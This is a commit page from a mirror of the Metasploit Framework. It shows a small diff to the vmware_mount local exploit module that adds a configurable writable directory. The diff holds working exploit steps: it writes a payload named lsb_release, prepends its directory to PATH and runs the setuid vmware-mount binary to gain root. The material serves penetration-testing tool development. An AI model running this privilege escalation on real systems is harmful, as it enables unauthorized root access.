infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add configurable directory, rather than relying on the session working 

directory.
bug/bundler_fix
Rasta Mouse 2014-11-27 17:12:37 +00:00
parent c0be32eac1
commit 25ecf73d7d
1 changed files with 8 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
modules/exploits/linux/local/vmware_mount.rb
View File

@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local
'DisclosureDate' => "Aug 22 2013"
}
))
register_options([
OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
], self.class)
end
def check
@ -68,13 +71,13 @@ class Metasploit4 < Msf::Exploit::Local
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
write_file("lsb_release", generate_payload_exe)
cmd_exec("chmod +x lsb_release")
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
path = "#{datastore["WritableDir"]}"
write_file("#{path}/lsb_release", generate_payload_exe)
cmd_exec("chmod +x #{path}/lsb_release")
cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
# Delete it here instead of using FileDropper because the original
# session can clean it up
cmd_exec("rm -f lsb_release")
cmd_exec("rm -f #{path}/lsb_release")
end
def setuid?(remote_file)